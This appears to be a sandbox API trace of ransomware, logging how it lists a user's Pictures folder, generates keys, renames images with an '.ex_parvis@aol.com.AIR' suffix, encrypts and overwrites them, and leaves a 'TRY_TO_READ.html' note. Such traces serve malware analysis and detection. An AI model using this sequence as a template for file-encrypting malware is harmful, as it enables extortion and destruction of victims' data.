	[0106.831] FindNextFileW (in: hFindFile=0x37b00a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96456f30, ftCreationTime.dwHighDateTime=0x1d4c552, ftLastAccessTime.dwLowDateTime=0xd76ca750, ftLastAccessTime.dwHighDateTime=0x1d4c681, ftLastWriteTime.dwLowDateTime=0xd76ca750, ftLastWriteTime.dwHighDateTime=0x1d4c681, nFileSizeHigh=0x0, nFileSizeLow=0x4507, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uyx803eHwfZGny.bmp", cAlternateFileName="UYX803~1.BMP")) returned 1
	[0106.831] FindNextFileW (in: hFindFile=0x37b00a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96456f30, ftCreationTime.dwHighDateTime=0x1d4c552, ftLastAccessTime.dwLowDateTime=0xd76ca750, ftLastAccessTime.dwHighDateTime=0x1d4c681, ftLastWriteTime.dwLowDateTime=0xd76ca750, ftLastWriteTime.dwHighDateTime=0x1d4c681, nFileSizeHigh=0x0, nFileSizeLow=0x4507, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uyx803eHwfZGny.bmp", cAlternateFileName="UYX803~1.BMP")) returned 0
	[0106.831] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.831] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.831] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp", dwFileAttributes=0x80) returned 1
	[0106.831] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp") returned 65
	[0106.831] GetProcessHeap () returned 0x540000
	[0106.831] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe8) returned 0x597dc8
	[0106.831] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp"
	[0106.831] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.831] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\uyx803ehwfzgny.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\uyx803ehwfzgny.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.834] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\uyx803eHwfZGny.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\uyx803ehwfzgny.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c
	[0106.834] GetProcessHeap () returned 0x540000
	[0106.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0106.834] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=17671) returned 1
	[0106.834] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x4507
	[0106.834] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.834] GetProcessHeap () returned 0x540000
	[0106.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.834] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.836] WriteFile (in: hFile=0x54c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.837] WriteFile (in: hFile=0x54c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.837] WriteFile (in: hFile=0x54c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.838] ReadFile (in: hFile=0x54c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x4507, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x4507, lpOverlapped=0x0) returned 1
	[0106.838] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.838] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.838] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg", dwFileAttributes=0x80) returned 1
	[0106.839] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg") returned 65
	[0106.839] GetProcessHeap () returned 0x540000
	[0106.839] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe8) returned 0x597dc8
	[0106.839] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg"
	[0106.839] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.839] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\fyc7htq8jxq_yz.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\fyc7htq8jxq_yz.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.911] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\FYC7HTQ8JXQ_Yz.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\fyc7htq8jxq_yz.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c
	[0106.911] GetProcessHeap () returned 0x540000
	[0106.911] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0106.911] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=48582) returned 1
	[0106.911] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xbdc6
	[0106.911] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.911] GetProcessHeap () returned 0x540000
	[0106.911] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.911] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.911] WriteFile (in: hFile=0x54c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.914] WriteFile (in: hFile=0x54c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.914] WriteFile (in: hFile=0x54c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.915] ReadFile (in: hFile=0x54c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0xbdc6, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0xbdc6, lpOverlapped=0x0) returned 1
	[0106.915] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.916] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.916] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg", dwFileAttributes=0x80) returned 1
	[0106.916] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg") returned 60
	[0106.916] GetProcessHeap () returned 0x540000
	[0106.916] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x601bd0
	[0106.916] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg"
	[0106.916] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.916] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\2yoekvu1i.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\2yoekvu1i.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.922] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\2yOEkvU1I.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\2yoekvu1i.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c
	[0106.922] GetProcessHeap () returned 0x540000
	[0106.922] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0106.922] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2983) returned 1
	[0106.922] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xba7
	[0106.922] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.922] GetProcessHeap () returned 0x540000
	[0106.922] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.922] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.922] WriteFile (in: hFile=0x54c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.926] WriteFile (in: hFile=0x54c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.927] WriteFile (in: hFile=0x54c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.927] ReadFile (in: hFile=0x54c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0xba7, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0xba7, lpOverlapped=0x0) returned 1
	[0106.927] SetFilePointer (in: hFile=0x54c, lDistanceToMove=-2983, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.927] WriteFile (in: hFile=0x54c, lpBuffer=0x37b1bf8*, nNumberOfBytesToWrite=0xba7, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1bf8*, lpNumberOfBytesWritten=0x3a1f778*=0xba7, lpOverlapped=0x0) returned 1
	[0106.927] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.927] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.927] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp", dwFileAttributes=0x80) returned 1
	[0106.927] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp") returned 63
	[0106.927] GetProcessHeap () returned 0x540000
	[0106.927] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x56b300
	[0106.927] lstrcpyW (in: lpString1=0x56b300, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp"
	[0106.927] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.927] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\-8fgbu3mfsxg.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\-8fgbu3mfsxg.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.930] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\-8FGbU3mFsxg.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\-8fgbu3mfsxg.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c
	[0106.930] GetProcessHeap () returned 0x540000
	[0106.930] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0106.930] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=83613) returned 1
	[0106.930] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1469d
	[0106.930] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.930] GetProcessHeap () returned 0x540000
	[0106.930] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.930] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.931] WriteFile (in: hFile=0x54c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.931] WriteFile (in: hFile=0x54c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.931] WriteFile (in: hFile=0x54c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.932] ReadFile (in: hFile=0x54c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x1469d, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x1469d, lpOverlapped=0x0) returned 1
	[0106.933] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb0c2db00, ftCreationTime.dwHighDateTime=0x1d4c6b4, ftLastAccessTime.dwLowDateTime=0xe65b85f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b00e0
	[0106.933] FindNextFileW (in: hFindFile=0x37b00e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb0c2db00, ftCreationTime.dwHighDateTime=0x1d4c6b4, ftLastAccessTime.dwLowDateTime=0xe65b85f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.934] FindNextFileW (in: hFindFile=0x37b00e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2f876f0, ftCreationTime.dwHighDateTime=0x1d4c985, ftLastAccessTime.dwLowDateTime=0x5bf173d0, ftLastAccessTime.dwHighDateTime=0x1d4cda7, ftLastWriteTime.dwLowDateTime=0x5bf173d0, ftLastWriteTime.dwHighDateTime=0x1d4cda7, nFileSizeHigh=0x0, nFileSizeLow=0x7756, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-lHIzydLVPZjPlkf1xb.png", cAlternateFileName="-LHIZY~1.PNG")) returned 1
	[0106.934] FindNextFileW (in: hFindFile=0x37b00e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b66c00, ftCreationTime.dwHighDateTime=0x1d4cae0, ftLastAccessTime.dwLowDateTime=0xbf920b0, ftLastAccessTime.dwHighDateTime=0x1d4c5ac, ftLastWriteTime.dwLowDateTime=0xbf920b0, ftLastWriteTime.dwHighDateTime=0x1d4c5ac, nFileSizeHigh=0x0, nFileSizeLow=0x33a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cwwnKrF3UVGErX2HqfG.png", cAlternateFileName="CWWNKR~1.PNG")) returned 1
	[0106.934] FindNextFileW (in: hFindFile=0x37b00e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa59453d0, ftCreationTime.dwHighDateTime=0x1d4c78b, ftLastAccessTime.dwLowDateTime=0xabd21820, ftLastAccessTime.dwHighDateTime=0x1d4c66b, ftLastWriteTime.dwLowDateTime=0xabd21820, ftLastWriteTime.dwHighDateTime=0x1d4c66b, nFileSizeHigh=0x0, nFileSizeLow=0xd06c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eAYtk.gif", cAlternateFileName="")) returned 1
	[0106.934] FindNextFileW (in: hFindFile=0x37b00e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6fc0830, ftCreationTime.dwHighDateTime=0x1d4c67b, ftLastAccessTime.dwLowDateTime=0xb6eff410, ftLastAccessTime.dwHighDateTime=0x1d4c671, ftLastWriteTime.dwLowDateTime=0xb6eff410, ftLastWriteTime.dwHighDateTime=0x1d4c671, nFileSizeHigh=0x0, nFileSizeLow=0x847d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M7v9lk0eRUDxEGMJWC.bmp", cAlternateFileName="M7V9LK~1.BMP")) returned 1
	[0106.934] FindNextFileW (in: hFindFile=0x37b00e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe65b85f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe65b85f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.934] FindNextFileW (in: hFindFile=0x37b00e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e3f32c0, ftCreationTime.dwHighDateTime=0x1d4cc0b, ftLastAccessTime.dwLowDateTime=0xc38c34b0, ftLastAccessTime.dwHighDateTime=0x1d4ccf0, ftLastWriteTime.dwLowDateTime=0xc38c34b0, ftLastWriteTime.dwHighDateTime=0x1d4ccf0, nFileSizeHigh=0x0, nFileSizeLow=0x9235, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_AA0BBztgimxF2KcIFdz.png", cAlternateFileName="_AA0BB~1.PNG")) returned 1
